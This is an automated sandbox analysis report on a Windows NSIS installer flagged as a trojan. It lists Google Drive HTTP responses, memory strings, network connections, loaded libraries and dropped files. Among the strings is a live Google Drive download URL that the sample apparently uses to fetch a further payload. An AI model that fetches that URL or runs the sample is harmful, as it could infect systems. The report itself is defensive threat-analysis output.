https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6lRNZc6u7DJPO2HzKnuWftVgwaVWAIKGIlYgL1a_ZIcerDNNpfhSpbx7-pG4zARFrZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:12 GMTContent-Security-Policy: script-src 'nonce-fCxnZETHthfpMs051sAoHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC70sfg7GGe-rm1nh9YPmU_wWbI51LQ_M26X60qUXXEgtkVx_EnBAXMAO1lD0Educ1VOContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:18 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-QRQeOCPHesK7WpgSOgqZdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ENJUW9YDNtqr91CXExvPDiKec78JJ-aSJG3E6-CbMaWA6RXmxY9pvwZNBmVRpXON5Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:23 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-6m_NedVDerj5VWVdAx2a7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Rn3ZSk2YusbqWeC-xe0HlNwUBSdJEsh5dulQ-8fhZ6y-S5IYzKnUCtespAhAbDKwNContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:29 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-cKUTA4beyHyle-T6IgySpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC55gEjPcwPIkiKeViFnktnNt2m9EBXdbAqyNvvmGFR9BdBnSisRSNH7j1tle65LpoiUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:34 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-vz4pdYJI02uB_MBo4kA2GQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: TEC-SPC-94.03.60.175.07.exe, 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000000.00000000.2244470500.0000000000409000.00000008.00000001.01000000.00000003.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000000.2349658011.0000000000409000.00000008.00000001.01000000.00000003.sdmp
      String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://apis.google.com
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2986887003.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=downloadu
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000002.3509649051.00000000068C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=downloady1
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3395018321.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3422500370.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3314199552.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3476961315.0000000006975000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3205829520.0000000006973000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3232423623.0000000006970000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3448946981.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3260063023.0000000006970000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3178271864.0000000006973000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/hE
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49776 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:49784 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49790 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49807 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49820 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:49843 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49849 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49880 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49909 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49920 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49937 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49950 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49966 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:49972 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49995 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:50001 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:50014 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:50022 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:50030 version: TLS 1.2
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_00405331 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405331
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040335A
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 2_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,2_2_0040335A
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_00404B6E0_2_00404B6E
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_0040659D0_2_0040659D
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 2_2_00404B6E2_2_00404B6E
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 2_2_0040659D2_2_0040659D
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: String function: 00402B3A appears 51 times
      Source: TEC-SPC-94.03.60.175.07.exe, 00000000.00000000.2244496305.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs TEC-SPC-94.03.60.175.07.exe
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000000.2349678329.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs TEC-SPC-94.03.60.175.07.exe
      Source: TEC-SPC-94.03.60.175.07.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal68.troj.evad.winEXE@3/10@2/2
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_00404635 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404635
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeFile created: C:\Users\user\subacidity.lnkJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeFile created: C:\Users\user\AppData\Local\Temp\nsnE9D5.tmpJump to behavior
      Source: TEC-SPC-94.03.60.175.07.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: TEC-SPC-94.03.60.175.07.exeReversingLabs: Detection: 57%
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeFile read: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess created: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess created: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"Jump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: subacidity.lnk.0.drLNK file: ..\..\Program Files (x86)\Common Files\cutline.sil
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
      Source: TEC-SPC-94.03.60.175.07.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

